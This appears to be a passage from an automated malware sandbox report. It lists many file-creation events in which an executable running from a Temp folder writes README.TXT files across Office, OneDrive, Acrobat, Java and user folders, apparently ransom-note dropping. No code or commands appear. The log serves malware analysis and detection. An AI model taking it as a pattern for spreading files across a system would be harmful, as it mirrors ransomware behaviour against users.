                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\quc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\quz-PE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ro\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ru\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\rw\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sourcemaps\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\SparsePackage\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sq\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sr-Cyrl-BA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sr-Cyrl-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sr-Latn-RS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ta\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\te\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ti\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tn-ZA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\tzdata\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ug\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\uk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ur\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\vi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\wo\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\xh-ZA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\yo-NG\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\zh-CN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\zh-TW\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\setup\logs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\catalog\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win7\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win8\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Crimson\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Notepad++\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\PSPad\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\TextPad\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\BPMLNOBVSB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\FENIVHOIKN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\NWTVCDUMOB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\UMMBDNEQBN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\VLZDGUKUTZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\WUTJSCBCFX\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\BPMLNOBVSB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Pictures\Camera Roll\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Pictures\Saved Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\PUB60COR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Favorites\Links\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Colors\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Effects\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\FENIVHOIKN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Simple\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\NWTVCDUMOB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\UMMBDNEQBN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\VLZDGUKUTZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\WUTJSCBCFX\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\Addons\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1036\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\3082\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AccessWeb\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ACCWIZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AugLoop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\BORDERS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Configuration\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FloodgateExperiences\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f14\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f33\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f4\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f7\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000006\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000008\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000009\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000011\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000050\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000055\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000064\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_w1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LogoImages\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Media\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\Presentation Designs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Common AppData\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\System\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\SystemX86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OneNote\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\osfFPA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookAutoDiscover\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PAGESIZE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PersonaSpy\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PROOF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBBA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBWIZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\QUERIES\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SAMPLES\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SkypeSrv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\STARTUP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\XLSTART\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\javafx\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\jdk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\AAD0B0DB-711A-45EF-A013-BDD28531EC08\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\applet\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\cmm\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\deploy\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\ext\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\i386\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\management\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\client\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dtplugin\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\plugin2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\Bundle\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\images\darkTheme\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\images\lightTheme\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\LogoImages\RNResources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\QtQml\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\QtQuick\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\QtQuick.2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sourcemaps\react\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXT
